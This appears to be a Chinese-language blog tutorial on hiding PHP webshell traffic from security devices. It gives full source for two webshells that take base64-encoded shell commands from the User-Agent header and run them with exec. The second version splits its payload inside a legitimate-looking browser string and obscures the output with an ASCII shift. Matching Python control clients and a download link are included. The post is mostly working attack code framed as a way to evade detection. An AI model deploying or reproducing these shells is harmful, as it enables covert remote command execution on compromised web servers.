PHPwebshell 流量加密分析
目前市场上的安全设备对于恶意数据流都可精准检测其特征,而常规的一句话木马、菜刀等特征过于明显。而且大部分的黑客工具都被列入特征库,所以攻击方的攻击手法很容易被针对,攻击链路也很容易被还原。
php一句话
常规的一句话木马传输参数均为明文传输,很容被针对检测。
简单加密
常规的webshell是将所需的payload通过post进行传参,很容易被流量设备检测。如下,可以通过user_agent base64加密进行传参执行命令。
Webshell原代码:
```
$dd = $_SERVER['HTTP_USER_AGENT’];
//获取user_agent参数
$qq = base64_decode($dd);
//解密user_agent参数
$jjj = exec ($qq,$out);
//执行user_agent参数
for ($i=0 ;$i < count($out) ;$i++){
$ls = $ls.$out[$i]."\n";
}
echo base64_encode($ls);
//加密输入执行后的系统命令
?>
```
顺手配上一个简单python客户端
客户端源代码:
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import requests
import base64
str_1 = ""
headers = {
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
"User-Agent": "adwd",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding":"gzip, deflate"
}
while True:
str_1 = input("please input cmd:")
str_1 = bytes(str_1, encoding="gbk")
str_1 = base64.b64encode(str_1)
headers['User-Agent']=str_1
ls = requests.get(url="http://127.0.0.1/1.php",headers=headers)#url更改位置
ls_1 = ls.content
ls_1 = base64.b64decode(ls_1)
ls_2 = str (ls_1, encoding="gbk")
print (ls_2)
混淆加密
思路:客户端将所需的payload进行拆分,嵌入正常的user_agent中,然后传入服务器。Webshell再从user_agent中提取payload执行,将回显命令通过base64+assic移位进行加密。
Webshell源码:
$dd = $_SERVER['HTTP_USER_AGENT'];
$dd = str_replace("Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_ Version/5.1 Safari/534.50", "", $dd);
$dd = str_replace("6_8; en-us) AppleWebKit/53", "", $dd);
$dd = str_replace("4.50 (KHTML, like Gecko)", "", $dd);#提取payload
$qq = base64_decode($dd);
$jjj = exec ($qq,$out);
for ($i=0 ;$i < count($out) ;$i++){
$ls = $ls.$out[$i]."\n";
}
function xxx($string_1)
{
#echo strlen($string_1);
for ($j=0 ;$j < strlen($string_1) ;$j++){
$string_1[$j] = chr(ord($string_1[$j])+1);
$ls_1 = $ls_1.$string_1[$j];
}
return $ls_1;
}
$ls = base64_encode($ls);#base64加密
$ls = xxx($ls);#assic移位
echo $ls;
?>
客户端源代码:
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import requests
import base64
str_1 = ""
str_2 = ""
def divide(str3):#拆分payload
num = int(len(str3)/2)
num_1 = int(len(str3))
str1 = str3[0:num]
str2 = str3[num:num_1]
return (str1,str2)
headers = {
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate"
}
user_agent_1 = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_ Version/5.1 Safari/534.50"
user_agent_2 = "6_8; en-us) AppleWebKit/53"
user_agent_3 = "4.50 (KHTML, like Gecko)"
headers['User-Agent']=user_agent_1+str_1+user_agent_2+str_2+user_agent_3#拼接user_agent
def xxx(string_1):#assic移位解密
xxx_ls = ""
for i in string_1:
xxx_ls = xxx_ls + chr(ord(i)-1)
return (xxx_ls)
print("example:http://127.0.0.1/1.php")
url = input("请输入:")
while True:
str_3 = input("please input cmd:")
str_3 = bytes(str_3, encoding="gbk")
str_3 = base64.b64encode(str_3)
str_1, str_2 = divide(str_3)
str_1 = str(str_1, encoding="gbk")
str_2 = str(str_2, encoding="gbk")
headers['User-Agent']=user_agent_1+str_1+user_agent_2+str_2+user_agent_3
ls = requests.get(url=url,headers=headers)
ls_1 = str(ls.content,encoding="gbk")
ls_1 = xxx(ls_1)
ls_1 = bytes(ls_1, encoding="gbk")
ls_1 = base64.b64decode(ls_1)
ls_2 = str (ls_1, encoding="gbk")
print (ls_2)
源码下载地址:
https://github.com/1109450752/php_shell/blob/master/php%E6%B7%B7%E6%B7%86%E5%8A%A0%E5%AF%86webshell.zip
2020-7-14
YLL